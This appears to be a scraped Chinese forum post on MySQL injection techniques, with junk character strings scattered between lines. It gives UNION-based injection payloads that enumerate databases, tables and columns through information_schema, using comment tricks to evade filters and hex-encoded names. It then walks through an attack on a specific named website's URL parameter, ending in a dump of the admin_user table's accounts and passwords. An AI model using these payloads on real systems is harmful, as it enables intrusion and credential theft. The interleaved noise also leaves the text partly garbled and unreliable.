mysql注入技巧

admin

查库

id=-1 union select 1,..,SCHEMA_NAME,n  from/**/information_schema.SCHEMATA limit 1,1/*

( W2 b0 y% V; w3 x& s9 u查表
7 A" S) n9 [6 ?4 ]$ L) K
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
# R" x! W6 E( T- u
, c2 I) l! p4 R& T. M查段

id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
4 G# [( W% `8 V9 Z$ l8 ]
5 Z9 e5 c. S: W4 J- x
* `9 q+ D* N) O' G# Wmysql5高级注入方法暴表
  x* A; y) ^1 p8 _/ C; E/ ^6 a; ]8 G
" G* n1 Q3 L6 b& g/ B% l2 S# P例子如下:
6 E- }4 c5 d) S! {+ f, j5 W
1.爆表
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*    (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
4 s- Q! s% G% b6 z( u2 j3 r这样爆到第4个时出现了admin_user表。

& ~5 \& n" Z4 A2.暴字段
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*

* z+ k/ ?; H2 X, K" J; K% l) u- ~
: e) d: D+ n: J9 a1 L+ }3.爆密码
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*

: Y+ O' D7 S' u! f  z